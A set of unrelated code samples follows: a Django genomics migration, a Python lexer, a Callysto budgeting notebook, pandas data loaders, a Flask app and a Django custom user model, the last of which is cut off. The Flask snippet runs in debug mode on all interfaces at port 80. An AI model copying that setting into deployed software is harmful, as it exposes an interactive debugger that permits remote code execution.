('hgnc_import', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.hgncgenenamesimport')),
],
),
migrations.CreateModel(
name='GnomADGeneConstraint',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('oe_lof', models.FloatField(null=True)),
('oe_lof_lower', models.FloatField(null=True)),
('oe_lof_upper', models.FloatField(null=True)),
('cached_web_resource', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='annotation.cachedwebresource')),
('gene', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='genes.gene')),
('gene_symbol', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.genesymbol')),
('transcript', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='genes.transcript')),
],
),
migrations.AddField(
model_name='geneversion',
name='hgnc',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='genes.hgncgenenames'),
),
migrations.AddField(
model_name='geneversion',
name='import_source',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.geneannotationimport'),
),
migrations.CreateModel(
name='GeneSymbolWiki',
fields=[
('wiki_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='snpdb.wiki')),
('gene_symbol', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='genes.genesymbol')),
],
options={
'get_latest_by': 'modified',
'abstract': False,
},
bases=('snpdb.wiki',),
),
migrations.CreateModel(
name='GeneSymbolAlias',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('alias', models.TextField(unique=True)),
('source', models.CharField(choices=[('N', 'NCBI'), ('U', 'UCSC'), ('H', 'HGNC'), ('M', 'Manual')], max_length=1)),
('description', models.TextField(null=True)),
('gene_symbol', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.genesymbol')),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),
],
options={
'get_latest_by': 'modified',
'abstract': False,
},
),
migrations.CreateModel(
name='GeneListWiki',
fields=[
('wiki_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='snpdb.wiki')),
('gene_list', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='genes.genelist')),
],
options={
'get_latest_by': 'modified',
'abstract': False,
},
bases=('snpdb.wiki',),
),
migrations.CreateModel(
name='GeneListCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField()),
('icon_css_class', models.TextField(blank=True)),
('hidden', models.BooleanField(default=False)),
('public', models.BooleanField(default=False)),
('description', models.TextField()),
('company', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='snpdb.company')),
],
),
migrations.AddField(
model_name='genelist',
name='category',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='genes.genelistcategory'),
),
migrations.AddField(
model_name='genelist',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.CreateModel(
name='GeneInfo',
fields=[
('name', models.TextField(primary_key=True, serialize=False)),
('description', models.TextField(blank=True)),
('icon_css_class', models.TextField()),
('gene_list', models.OneToOneField(null=True, on_delete=django.db.models.deletion.PROTECT, to='genes.genelist')),
],
),
migrations.CreateModel(
name='GeneCoverageCollection',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('path', models.TextField()),
('data_state', models.CharField(choices=[('N', 'Non Existent'), ('D', 'Deleted'), ('R', 'Running'), ('S', 'Skipped'), ('E', 'Error'), ('C', 'Complete')], max_length=1)),
('genome_build', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='snpdb.genomebuild')),
],
),
migrations.CreateModel(
name='GeneCoverageCanonicalTranscript',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('original_gene_symbol', models.TextField()),
('original_transcript_id', models.TextField()),
('min', models.IntegerField()),
('mean', models.FloatField()),
('std_dev', models.FloatField()),
('percent_0x', models.FloatField()),
('percent_10x', models.FloatField(null=True)),
('percent_20x', models.FloatField()),
('percent_100x', models.FloatField(null=True)),
('sensitivity', models.FloatField()),
('canonical_transcript_collection', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='genes.canonicaltranscriptcollection')),
('gene_coverage_collection', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.genecoveragecollection')),
('gene_symbol', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='genes.genesymbol')),
('transcript', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='genes.transcript')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='GeneCoverage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('original_gene_symbol', models.TextField()),
('original_transcript_id', models.TextField()),
('min', models.IntegerField()),
('mean', models.FloatField()),
('std_dev', models.FloatField()),
('percent_0x', models.FloatField()),
('percent_10x', models.FloatField(null=True)),
('percent_20x', models.FloatField()),
('percent_100x', models.FloatField(null=True)),
('sensitivity', models.FloatField()),
('gene_coverage_collection', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.genecoveragecollection')),
('gene_symbol', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='genes.genesymbol')),
('transcript', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='genes.transcript')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='CustomTextGeneList',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('md5_hash', models.CharField(max_length=32)),
('name', models.TextField()),
('text', models.TextField()),
('gene_list', models.OneToOneField(null=True, on_delete=django.db.models.deletion.SET_NULL, to='genes.genelist')),
],
),
migrations.CreateModel(
name='CanonicalTranscript',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('original_gene_symbol', models.TextField()),
('original_transcript_id', models.TextField()),
('collection', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.canonicaltranscriptcollection')),
('gene_symbol', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='genes.genesymbol')),
('transcript', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='genes.transcript')),
],
),
migrations.CreateModel(
name='CachedThirdPartyGeneList',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('cached_web_resource', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='annotation.cachedwebresource')),
('company', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='snpdb.company')),
],
),
migrations.CreateModel(
name='ReleaseTranscriptVersion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('release', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.geneannotationrelease')),
('transcript_version', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.transcriptversion')),
],
options={
'unique_together': {('release', 'transcript_version')},
},
),
migrations.CreateModel(
name='ReleaseGeneVersion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('gene_version', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.geneversion')),
('release', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.geneannotationrelease')),
],
options={
'unique_together': {('release', 'gene_version')},
},
),
migrations.CreateModel(
name='ReleaseGeneSymbolGene',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('match_info', models.TextField(null=True)),
('gene', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.gene')),
('release_gene_symbol', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.releasegenesymbol')),
],
options={
'unique_together': {('release_gene_symbol', 'gene')},
},
),
migrations.AlterUniqueTogether(
name='geneversion',
unique_together={('gene', 'version', 'genome_build')},
),
migrations.CreateModel(
name='GeneListGeneSymbol',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('original_name', models.TextField(blank=True, null=True)),
('modification_info', models.TextField(null=True)),
('gene_list', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.genelist')),
('gene_symbol', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='genes.genesymbol')),
('gene_symbol_alias', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='genes.genesymbolalias')),
],
options={
'unique_together': {('gene_list', 'original_name')},
},
),
]
| StarcoderdataPython |
3322348 | <filename>src/mau/lexers/base_lexer.py
import re
import string
from functools import partial
from collections.abc import Sequence
from mau import text_buffer
class TokenTypes:
EOL = "EOL"
EOF = "EOF"
LITERAL = "LITERAL"
TEXT = "TEXT"
WHITESPACE = "WHITESPACE"
class LexerError(ValueError):
pass
class TokenError(ValueError):
pass
class Token:
def __init__(self, _type, value=None, position=None):
self.type = _type
self.value = str(value) if value is not None else None
self.position = position
def __str__(self):
position_string = ""
if self.position:
position_string = f", line={self.position[0]}, col={self.position[1]}"
value_string = ""
if self.value is not None:
value_string = f", '{self.value}'"
return f"Token({self.type}{value_string}{position_string})"
__repr__ = __str__
def __eq__(self, other):
if other.value is None:
return self.type == other.type
return (self.type, self.value) == (
other.type,
other.value,
)
def __hash__(self):
return hash((self.type, self.value))
def __len__(self):
if self.value:
return len(self.value)
return 0
def __bool__(self):
return True
EOL = Token(TokenTypes.EOL)
EOF = Token(TokenTypes.EOF)
WS = partial(Token, TokenTypes.WHITESPACE)
Text = partial(Token, TokenTypes.TEXT)
Literal = partial(Token, TokenTypes.LITERAL)
class BaseLexer:
def __init__(self, initial_position=None):
self._text_buffer = text_buffer.TextBuffer()
self._text_buffer.position
self._buffer = []
self._initial_position = initial_position or (0, 0)
self.tokens = []
@property
def _token_position(self):
return tuple(map(sum, zip(self._text_buffer.position, self._initial_position)))
def process(self, text):
self.tokens = []
self.index = -1
self._text_buffer.load(text)
self._process()
while self.tokens[-1].type is not TokenTypes.EOF:
self._process()
def _process(self):
# This should not be touched by child classes
# as it is the core of the lexer. It tries
# each function in the list returned by
# _process_functions and stores all the resulting
# tokens. A parsing function must return None
# when characters do not match the rules.
process_functions = self._process_functions()
process_functions.append(self._process_error)
for process_func in process_functions:
result = self._wrap(process_func())
if result is None:
continue
self.tokens.extend(result)
return
def _wrap(self, result):
# Makes sure the result is either None or a list of tokens
if result is None:
return
if not isinstance(result, Sequence):
return [result]
return result
def _nextline(self):
# Carriage return =)
self._initial_position = (self._initial_position[0], 0)
# Skip the whole line including the EOL
self._text_buffer.nextline()
def _skip(self, steps=1):
# Skip only the given amount of characters
self._text_buffer.skip(steps)
@property
def _current_char(self):
return self._text_buffer.current_char
@property
def _current_line(self):
return self._text_buffer.current_line
@property
def _tail(self):
return self._text_buffer.tail
def _create_token(self, token_type, token_value=None):
return Token(token_type, token_value, position=self._token_position)
def _create_token_and_skip(self, token_type, token_value=None, skip_value=None):
skip = next(x for x in [skip_value, token_value, ""] if x is not None)
token = self._create_token(token_type, token_value)
if token_type == TokenTypes.EOL:
self._nextline()
else:
self._skip(len(skip))
return token
def _store(self, token_type, token_value=None, skip_value=None):
self._buffer.append(
self._create_token_and_skip(token_type, token_value, skip_value)
)
def _pop(self):
tokens = list(self._buffer)
self._buffer = []
return tokens
def _process_eof(self):
try:
self._current_line
except text_buffer.EOFError:
return self._create_token_and_skip(TokenTypes.EOF)
def _process_eol(self):
try:
self._current_char
except text_buffer.EOLError:
return self._create_token_and_skip(TokenTypes.EOL)
def _process_character(self):
if self._current_char not in string.ascii_letters:
return None
self._store(TokenTypes.TEXT, self._current_char)
return self._pop()
def _process_whitespace(self):
regexp = re.compile(r"\ +")
match = regexp.match(self._tail)
if not match:
return None
self._store(TokenTypes.WHITESPACE, match.group())
return self._pop()
def _process_functions(self):
return [
self._process_eof,
self._process_eol,
self._process_whitespace,
self._process_character,
]
def _process_error(self):
raise LexerError(f'Can\'t process "{self._tail}"')
| StarcoderdataPython |
1655628 | <reponame>BryceHaley/curriculum-jbook<gh_stars>1-10

<a href="https://hub.callysto.ca/jupyter/hub/user-redirect/git-pull?repo=https%3A%2F%2Fgithub.com%2Fcallysto%2Fcurriculum-notebooks&branch=master&subPath=Health/CALM/CALM-moving-out-6.ipynb&depth=1" target="_parent"><img src="https://raw.githubusercontent.com/callysto/curriculum-notebooks/master/open-in-callysto-button.svg?sanitize=true" width="123" height="24" alt="Open in Callysto"/></a>
# CALM - Moving Out 6
## Part 6 - Food and Supplies
📙In this section we will consider food and household supplies that you will need. You will be using a [dataframes from a Python library called pandas](https://pandas.pydata.org/pandas-docs/stable/getting_started/dsintro.html#dataframe). These dataframes are like spreadsheets, and the code will look a little complicated, but it shouldn't be too bad.
### Meal Plan
Before we get into dataframes, though, you need to create a meal plan. With the [Canadian Food Guide](https://food-guide.canada.ca/en/food-guide-snapshot/) in mind, complete a 7-day meal plan considering nutritionally balanced choices at each meal. You can choose to eat out only twice on this menu.
You will then use this to decide your grocery needs for one week.
Replace the words "meal" in the cell below with the meals you plan to eat, then run the cell to store your plan.
%%writefile moving_out_8.txt
✏️
|Day|Breakfast|Lunch|Dinner|
|-|-|-|-|
|Monday| meal | meal | meal |
|Tuesday| meal | meal | meal |
|Wednesday| meal | meal | meal |
|Thursday| meal | meal | meal |
|Friday| meal | meal | meal |
|Saturday| meal | meal | meal |
|Sunday| meal | meal | meal |
### Food Shopping
📙From your meal plan make a shopping list of food needed to prepare three meals a day for one week. Research the price of these food items by going to grocery store websites, using grocery fliers, going to the grocery store, or reviewing receipts or bills with your family. Buying items in bulk is usually more economical in the long run, but for this exercise you only require food for one week so choose the smallest quantities possible.
`Run` the following cell to generate a data table that you can then edit.
Double-click on the "nan" values to put in your information. Use the "Add Row" and "Remove Row" buttons if necessary.
import pandas as pd
import qgrid
foodItemList = ['Vegetables','Fruit','Protein','Whole Grains','Snacks','Restaurant Meal 1','Restaurant Meal 2']
foodColumns = ['Size','Quantity','Price']
foodIndex = range(1,len(foodItemList)+1)
dfFood = pd.DataFrame(index=pd.Series(foodIndex), columns=pd.Series(foodColumns))
dfFood.insert(0,'Item(s)',foodItemList,True)
dfFood['Quantity'] = 1
dfFood['Price'] = 1
dfFoodWidget = qgrid.QgridWidget(df=dfFood, show_toolbar=True)
dfFoodWidget
📙After you have added data to the table above, `Run` the next cell to calculate your food costs for the month. It adds up weekly food costs and multiplies by 4.3 weeks per month.
foodShoppingList = dfFoodWidget.get_changed_df()
foodPrices = pd.to_numeric(foodShoppingList['Price'])
weeklyFoodCost = foodPrices.sum()
monthlyFoodCost = weeklyFoodCost * 4.3
%store monthlyFoodCost
print('That is about $' + str(weeklyFoodCost) + ' per week for food.')
print('Your food for the month will cost about $' + str('{:.2f}'.format(monthlyFoodCost)) + '.')
### Household Supplies and Personal Items
📙The following is a typical list of household and personal items. Add any additional items you feel you need and delete items you don’t need. Look for smaller quantities with a **one-month** budget in mind, or adjust pricing if buying in bulk.
`Run` the next cell to generate a data table that you can then edit.
householdItemList = ['Toilet Paper','Tissues','Paper Towel',
'Dish Soap','Laundry Detergent','Cleaners',
'Plastic Wrap','Foil','Garbage/Recycling Bags',
'Condiments','Coffee/Tea','Flour','Sugar',
'Shampoo','Conditioner','Soap','Deodorant',
'Toothpaste','Mouthwash','Hair Products','Toothbrush',
'Makeup','Cotton Balls','Shaving Gel','Razors',
]
householdColumns = ['Size','Quantity','Price']
householdIndex = range(1,len(householdItemList)+1)
dfHousehold = pd.DataFrame(index=pd.Series(householdIndex), columns=pd.Series(householdColumns))
dfHousehold.insert(0,'Item(s)',householdItemList,True)
dfHousehold['Quantity'] = 1
dfHousehold['Price'] = 1
dfHouseholdWidget = qgrid.QgridWidget(df=dfHousehold, show_toolbar=True)
dfHouseholdWidget
📙After you have added data to the above data table, `Run` the next cell to calculate your monthly household item costs.
householdShoppingList = dfHouseholdWidget.get_changed_df()
householdPrices = pd.to_numeric(householdShoppingList['Price'])
monthlyHouseholdCost = householdPrices.sum()
%store monthlyHouseholdCost
print('That is about $' + str(monthlyHouseholdCost) + ' per month for household items.')
### Furniture and Equipment
📙Think about items you need for your place. How comfortable do you want to be? Are there items you have already been collecting or that your family is saving for you? Discuss which items they may be willing to give you, decide which items you can do without, which items a roommate may have, and which items you will need to purchase. Although it is nice to have new things, remember household items are often a bargain at garage sales, dollar stores, and thrift stores.
`Run` the next cell to generate a data table that you can edit.
fneItemList = ['Pots and Pans','Glasses','Plates','Bowls',
'Cutlery','Knives','Oven Mitts','Towels','Cloths',
'Toaster','Garbage Cans','Kettle','Table','Kitchen Chairs',
'Broom and Dustpan','Vacuum Cleaner','Clock',
'Bath Towels','Hand Towels','Bath Mat',
'Toilet Brush','Plunger',
'Bed','Dresser','Night Stand','Sheets','Blankets','Pillows',
'Lamps','TV','Electronics','Coffee Table','Couch','Chairs',
]
fneColumns = ['Room','Quantity','Price']
fneIndex = range(1,len(fneItemList)+1)
dfFne = pd.DataFrame(index=pd.Series(fneIndex), columns=pd.Series(fneColumns))
dfFne.insert(0,'Item(s)',fneItemList,True)
dfFne['Quantity'] = 1
dfFne['Price'] = 1
dfFneWidget = qgrid.QgridWidget(df=dfFne, show_toolbar=True)
dfFneWidget
📙Next `Run` the following cell to add up your furniture and equipment costs.
fneList = dfFneWidget.get_changed_df()
fnePrices = pd.to_numeric(fneList['Price'])
fneCost = fnePrices.sum()
%store fneCost
print('That is about $' + str(fneCost) + ' for furniture and equipment items.')
### Clothing
📙When calculating the cost of clothing for yourself, consider the type of work you plan to be doing and how important clothing is to you. Consider how many of each item of clothing you will purchase in a year, and multiply this by the cost per item. Be realistic.
`Run` the next cell to generate an editable data table.
clothingItemList = ['Dress Pants','Skirts','Shirts','Suits/Jackets/Dresses'
'T-Shirts/Tops','Jeans/Pants','Shorts',
'Dress Shoes','Casual Shoes','Running Shoes',
'Outdoor Coats','Boots','Sports Clothing',
'Pajamas','Underwear','Socks','Swimsuits'
]
clothingColumns = ['Quantity Required','Cost per Item']
clothingIndex = range(1,len(clothingItemList)+1)
dfClothing = pd.DataFrame(index=pd.Series(clothingIndex), columns=pd.Series(clothingColumns))
dfClothing.insert(0,'Item(s)',clothingItemList,True)
dfClothing['Quantity Required'] = 1
dfClothing['Cost per Item'] = 1
dfClothingWidget = qgrid.QgridWidget(df=dfClothing, show_toolbar=True)
dfClothingWidget
📙Once you have added data to the above table, `Run` the next cell to add up your clothing costs.
clothingList = dfClothingWidget.get_changed_df()
clothingQuantities = pd.to_numeric(clothingList['Quantity Required'])
clothingPrices = pd.to_numeric(clothingList['Cost per Item'])
clothingList['Total Cost'] = clothingQuantities * clothingPrices
clothingCost = clothingList['Total Cost'].sum()
monthlyClothingCost = clothingCost / 12
%store monthlyClothingCost
print('That is $' + str('{:.2f}'.format(clothingCost)) + ' per year, or about $' + str('{:.2f}'.format(monthlyClothingCost)) + ' per month for clothing.')
clothingList # this displays the table with total cost calculations
### Health Care
📙Most people living and working in Alberta have access to hospital and medical services under the [Alberta Health Care Insurance Plan (AHCIP)](https://www.alberta.ca/ahcip.aspx) paid for by the government. Depending on where you work, your employer may offer additional benefit packages such as Extended Health Care that cover a portion of medical and dental expenses.
If you do not have health benefits from your employer you will have to pay for medications, dental visits, and vision care.
Allow money in your budget for prescriptions and over-the-counter medications.
Budget for the dentist and optometrist. One visit to the dentist including a check-up x-rays and teeth cleaning is approximately $330. You should see your dentist yearly.
A visit to the optometrist is approximately $120. You should normally see your optometrist once every 2 years, or once a year if you’re wearing contact lenses.
`Run` the next cell to display a data table that you can edit with your expected health costs.
healthItems = [
'Pain Relievers','Bandages','Cough Medicine',
'Prescriptions','Dental Checkup',
'Optometrist','Glasses','Contacts','Contact Solution',
'Physiotherapy','Massage'
]
healthColumns = ['Cost Per Year']
healthIndex = range(1,len(healthItems)+1)
dfHealth = pd.DataFrame(index=pd.Series(healthIndex), columns=pd.Series(healthColumns))
dfHealth.insert(0,'Item or Service',healthItems,True)
dfHealth['Cost Per Year'] = 1
dfHealthWidget = qgrid.QgridWidget(df=dfHealth, show_toolbar=True)
dfHealthWidget
📙`Run` the next cell to add up your health care costs.
healthList = dfHealthWidget.get_changed_df()
healthCost = pd.to_numeric(healthList['Cost Per Year']).sum()
monthlyHealthCost = healthCost / 12
%store monthlyHealthCost
print('That is $' + str('{:.2f}'.format(healthCost)) + ' per year, or about $' + str('{:.2f}'.format(monthlyHealthCost)) + ' per month for health care.')
📙Once again, `Run` the next cell to check that your answers have been stored.
print('Monthly food cost:', monthlyFoodCost)
print('Monthly household items cost:', monthlyHouseholdCost)
print('Furniture and equipment cost:', fneCost)
print('Monthly clothing cost:', monthlyClothingCost)
print('Monthly health cost', monthlyHealthCost)
with open('moving_out_8.txt', 'r') as file8:
print(file8.read())
📙You have now completed this section. Proceed to [section 7](./CALM-moving-out-7.ipynb)
[](https://github.com/callysto/curriculum-notebooks/blob/master/LICENSE.md) | StarcoderdataPython |
3341285 | import os
import pandas as pd
from tqdm import tqdm
def load_tag_info(path):
tag_info = open(path).read()
tag_info = tag_info.replace(' ', ' ')
tag_info = tag_info.replace(' ', ' ')
tag_info = tag_info.replace(' ', ' ')
tag_info = tag_info.replace(':', '')
tag_info = tag_info.replace(' \n', '\n')
tag_info_list = tag_info.split('\n')
tmp = [[i for i in line.split(' ')] for line in tag_info_list[2:] if ' ' in line]
tag_df = pd.DataFrame(tmp)
tag_df.columns = ['tag_id', 'x', 'y', 'z']
tag_df['tag_id'] = tag_df['tag_id'].astype('int')
for key in ['x', 'y', 'z']:
tag_df[key] = tag_df[key].astype('float')*10.0
return tag_df
def load_distince_data_origin(path):
d1 = open(path).read()
d2 = d1.split('\n')
d3 = pd.DataFrame([line.split(':') for line in d2 if len(line.split(':')) == 9])
d3.columns = ['c1', 'unixtime', 'c3', 'tag_id', 'anchor_id', 'distance', 'distance_check', 'c8', 'data_index']
d3['tag_id'] = d3['tag_id'].astype('float')
d3['distance'] = d3['distance'].astype('float')
d3['distance_check'] = d3['distance_check'].astype('float')
return d3
def load_distince_data(path):
d3 = load_distince_data_origin(path)
d41 = d3[['data_index', 'anchor_id', 'distance']].pivot(index='data_index', columns='anchor_id', values='distance')
d41.reset_index(inplace=True)
d41.columns = ['data_index', 'dis_0', 'dis_1', 'dis_2', 'dis_3']
d42 = d3[['data_index', 'anchor_id', 'distance_check']].pivot(
index='data_index', columns='anchor_id', values='distance_check')
d42.reset_index(inplace=True)
d42.columns = ['data_index', 'dis_c_0', 'dis_c_1', 'dis_c_2', 'dis_c_3']
d5 = d3[['c1', 'data_index', 'c3', 'tag_id', 'c8', 'unixtime']].groupby(['data_index']).max().reset_index()
d6 = pd.merge(d5, d41, on=['data_index'])
d6 = pd.merge(d6, d42, on=['data_index'])
d6.reset_index(drop=True, inplace=True)
assert len(d41) == len(d41) == len(d5) == len(d6)
return d6
def load_all_and_merge(path_dir, target_file=None, overwrite=False):
target_file = target_file or f'data/{os.path.basename(path_dir)}.csv'
if not overwrite and os.path.exists(target_file):
return pd.read_csv(target_file)
file_list = os.listdir(path_dir)
file_list = sorted(file_list, key=lambda x: int(x.split('.')[0]))
dfs = []
for file_name in tqdm(file_list):
tag_id = int(file_name.split('.')[0])
path = os.path.join(path_dir, file_name)
df1 = load_distince_data(path)
df1['tag_id'] = tag_id
dfs.append(df1)
res = pd.concat(dfs)
res.to_csv(target_file, index=None)
return res
| StarcoderdataPython |
3379507 | from dataclasses import dataclass
from typing import Generic, GenericAlias, TypeVar
T = TypeVar("T")
U = TypeVar("U")
@dataclass
class _Point(Generic[T, U]):
x: T
y: U
class _Point_(_Point):
@classmethod
def __class_getitem__(cls):
return GenericAlias
class _Display_(_Point):
def __repr__(self) -> str:
return f"({self.x}, {self.y})"
class Point(
_Display_,
_Point_,
_Point,
Generic[T, U],
):
def __init__(self, x: T, y: U):
super(Point, self).__init__(x, y)
| StarcoderdataPython |
1674545 | <gh_stars>0
from flask import Flask
from flask import render_template
app = Flask(__name__)
app.config.update(
DEBUG=True,
SEND_FILE_MAX_AGE_DEFAULT=0
)
@app.route('/')
def index():
return render_template('index.html')
if __name__ == "__main__":
app.run(host='0.0.0.0', debug=True, port=80)
| StarcoderdataPython |
1611988 | from __future__ import unicode_literals
import json
from django.db import models
from django.utils.six import text_type as str
from django.utils.translation import ugettext_lazy as _
from django.urls import reverse
from django.utils import timezone
from django.contrib.auth.models import (AbstractBaseUser, PermissionsMixin,
BaseUserManager)
from django.contrib.auth.validators import UnicodeUsernameValidator
from django.utils.encoding import python_2_unicode_compatible
from oauth2_provider.models import AbstractApplication
from froide.helper.csv_utils import export_csv, get_dict
class UserManager(BaseUserManager):
def _create_user(self, email, username, password,
is_staff, is_superuser, **extra_fields):
"""
Creates and saves a User with the given email and password.
"""
now = timezone.now()
if not email:
raise ValueError('The given email must be set')
email = self.normalize_email(email)
if not username:
raise ValueError('The given username must be set')
username = self.model.normalize_username(username)
user = self.model(email=email,
is_staff=is_staff, is_active=True,
is_superuser=is_superuser, last_login=now,
date_joined=now, **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_user(self, email, username, password=None, **extra_fields):
return self._create_user(email, username, password, False, False,
**extra_fields)
def create_superuser(self, email, username, password=None, **extra_fields):
return self._create_user(email, username, password, True, True,
**extra_fields)
@python_2_unicode_compatible
class User(AbstractBaseUser, PermissionsMixin):
username_validator = UnicodeUsernameValidator()
username = models.CharField(
_('username'),
max_length=150,
unique=True,
help_text=_('Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.'),
validators=[username_validator],
error_messages={
'unique': _("A user with that username already exists."),
},
)
first_name = models.CharField(_('first name'), max_length=30, blank=True)
last_name = models.CharField(_('last name'), max_length=150, blank=True)
email = models.EmailField(_('email address'), unique=True, null=True,
blank=True)
is_staff = models.BooleanField(
_('staff status'),
default=False,
help_text=_('Designates whether the user can log into this admin site.'),
)
is_active = models.BooleanField(
_('active'),
default=True,
help_text=_(
'Designates whether this user should be treated as active. '
'Unselect this instead of deleting accounts.'
),
)
date_joined = models.DateTimeField(_('date joined'), default=timezone.now)
organization = models.CharField(_('Organization'), blank=True, max_length=255)
organization_url = models.URLField(_('Organization URL'), blank=True, max_length=255)
private = models.BooleanField(_('Private'), default=False)
address = models.TextField(_('Address'), blank=True)
terms = models.BooleanField(_('Accepted Terms'), default=True)
newsletter = models.BooleanField(_('Wants Newsletter'), default=False)
is_expert = models.BooleanField(_('Expert'), help_text=_('Unlocks shortcuts and other experienced user features'), default=False)
is_trusted = models.BooleanField(_('Trusted'), default=False)
is_blocked = models.BooleanField(_('Blocked'), default=False)
is_deleted = models.BooleanField(_('deleted'), default=False,
help_text=_('Designates whether this user was deleted.'))
date_left = models.DateTimeField(_('date left'), default=None, null=True, blank=True)
objects = UserManager()
USERNAME_FIELD = 'email'
EMAIL_FIELD = 'email'
REQUIRED_FIELDS = ['username']
def __str__(self):
if self.email is None:
return self.username
return self.email
def get_absolute_url(self):
if self.private:
return ""
return reverse('account-profile', kwargs={'slug': self.username})
def get_full_name(self):
"""
Returns the first_name plus the last_name, with a space in between.
"""
full_name = '%s %s' % (self.first_name, self.last_name)
return full_name.strip()
def get_short_name(self):
"Returns the short name for the user."
return self.first_name
def get_dict(self, fields):
d = get_dict(self, fields)
d['request_count'] = self.foirequest_set.all().count()
return d
def trusted(self):
return self.is_trusted or self.is_staff or self.is_superuser
@classmethod
def export_csv(cls, queryset):
fields = (
"id", "first_name", "last_name", "email",
"organization", "organization_url", "private",
"date_joined", "is_staff",
"address", "terms", "newsletter",
"request_count",
)
return export_csv(queryset, fields)
def as_json(self):
return json.dumps({
'id': self.id,
'first_name': self.first_name,
'last_name': self.last_name,
'address': self.address,
'private': self.private,
'email': self.email,
'organization': self.organization
})
def display_name(self):
if self.private:
return str(_("<< Name Not Public >>"))
else:
if self.organization:
return '%s (%s)' % (self.get_full_name(), self.organization)
else:
return self.get_full_name()
def get_autologin_url(self, url):
from .services import AccountService
service = AccountService(self)
return service.get_autologin_url(url)
def get_password_change_form(self, *args, **kwargs):
from django.contrib.auth.forms import SetPasswordForm
return SetPasswordForm(self, *args, **kwargs)
def get_change_form(self, *args, **kwargs):
from froide.account.forms import UserChangeForm
return UserChangeForm(self, *args, **kwargs)
class Application(AbstractApplication):
description = models.TextField(blank=True)
homepage = models.CharField(max_length=255, blank=True)
image_url = models.CharField(max_length=255, blank=True)
auto_approve_scopes = models.TextField(blank=True)
created = models.DateTimeField(auto_now_add=True, null=True)
updated = models.DateTimeField(auto_now=True, null=True)
def allows_grant_type(self, *grant_types):
# only allow GRANT_AUTHORIZATION_CODE, GRANT_IMPLICIT
# regardless of application setting
return bool(set([
AbstractApplication.GRANT_AUTHORIZATION_CODE,
AbstractApplication.GRANT_IMPLICIT
]) & set(grant_types))
def can_auto_approve(self, scopes):
"""
Check if the token allows the provided scopes
:param scopes: An iterable containing the scopes to check
"""
if not scopes:
return True
